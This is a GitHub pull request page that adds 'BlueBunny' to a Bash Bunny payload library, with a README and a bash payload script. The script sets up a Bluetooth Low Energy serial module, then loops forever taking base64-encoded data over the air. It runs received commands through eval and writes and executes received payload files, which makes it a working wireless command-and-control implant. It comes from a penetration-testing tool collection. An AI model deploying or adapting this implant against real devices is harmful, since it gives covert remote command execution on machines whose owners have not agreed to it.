Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add BlueBunny #670

Merged
merged 3 commits into from
Jun 8, 2024
Merged

Add BlueBunny #670

Show file tree
Hide file tree
Changes from 1 commit
Commits
Show all changes
3 commits
Select commit Hold shift + click to select a range
678359b
Add BlueBunny
90N45-d3v Oct 31, 2023
94b43bf
Add instructions to README.md
90N45-d3v Jun 8, 2024
c9ecb7c
Add BlueBunny C2 source code
90N45-d3v Jun 8, 2024
File filter

Filter by extension

Filter by extension
Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
20 changes: 20 additions & 0 deletions payloads/library/remote_access/BlueBunny/README.md
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
# BlueBunny
* Author: 90N45
* Version: 1.0
* Category: Remote
* Attackmodes: NONE (Custom)

### Description
Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
Send your Bash Bunny all the instructions it needs on-demand over the air.

### Setup
This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny)
90N45-d3v marked this conversation as resolved.
Show resolved Hide resolved

### Status
| LED | State |
| --- | --- |
| Magenta solid (SETUP) | Configuring BLE |
| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 |

*Average runtime: 13 seconds*
63 changes: 63 additions & 0 deletions payloads/library/remote_access/BlueBunny/payload.txt
View file
Open in desktop
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
#!/bin/bash
#
# Title: BlueBunny
# Description: BLE based C2 server for the Bash Bunny Mark II
# Author: 90N45
# Version: 1.0
# Category: Remote
# Attackmodes: NONE (Custom)

LED SETUP

# Enable serial BLE module
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1

# Configure BLE module as slave
echo -n -e "AT+ROLE=0" > /dev/ttyS1
echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
echo -n -e "AT+ADV=1" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1

LED FINISH

while [[ true ]]; do
# Get incomming data from serial port
data=$(head -1 /dev/ttyS1)

# Decode base64 encoded data
data=$(echo ${data} | base64 -d)

# Echo data for debugging
echo "Debugger: ${data}"

# Single command
if [[ $data =~ "<CMD>" ]]; then
# Extract command
command=${data#*<CMD>}
command=${command%%<CMD>*}

# Run recieved command
eval "${command}"
fi

# Payload file
if [[ $data =~ "<PAYLOAD>" ]]; then
# Set payload file name
file="BlueBunnyPayload-${RANDOM}.txt"

# Extract file content
content=${data#*<PAYLOAD>}
content=${content%%<PAYLOAD>*}

# Write content to file
printf "${content}" > "${file}";

# Run payload
bash $file

# Remove payload file
rm $file
fi
done